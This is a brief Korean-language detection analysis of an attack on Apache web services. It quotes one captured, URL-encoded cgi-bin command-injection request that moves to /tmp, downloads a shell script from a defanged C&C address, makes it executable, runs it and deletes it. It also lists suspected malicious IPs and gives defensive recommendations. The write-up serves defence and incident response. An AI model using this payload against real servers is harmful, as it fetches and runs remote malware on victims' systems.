아파치 웹 서비스 공격 탐지 분석 자료

아파치 웹 서비스 공격 탐지 분석 자료

웹 서비스 관련 악성 트래픽
IP/Port 스캐닝 행위 및 C&C 서버를 통한 추가 악성 행위 가능

탐지 트래픽

[Target IP]:80/cgi-bin/;cd+%2Ftmp%3Bwget+http%3A%2F%2F 45[.]95[.]55[.]214
%2Fa%2Fwget.sh%3Bchmod+777+wget.sh%3Bsh+wget.sh+Netgear%3Brm+-rf+wget.sh

- Apache/cgi-bin 디렉토리에 보관된 스크립트 활용

- cd, wget [C&C IP], chmod 등 command를 통한 악성파일 다운로드&실행

- 45[.]95[.]55[.]214 IP는 Malware와 관련된 IP로 알려져 있음

악성 IP

• 195.178.120[.]33
• 195.178.120[.]41
• 195.178.120[.]55
• 193.176.211[.]180
• 45.95.55[.]214 (Related Malware)

 

 

 

결론

• 악성 평판 IP에 대한 보안 시스템에서 접근 제어 적용
• 보안 시스템에서의 탐지/차단에 대한 지속적인 모니터링과
• C&C 통신 이력이 발견된다면 추가적인 클라이언트 조사까지 진행
• 동일 유형에 대한 대비 전략과 대응 방안 마련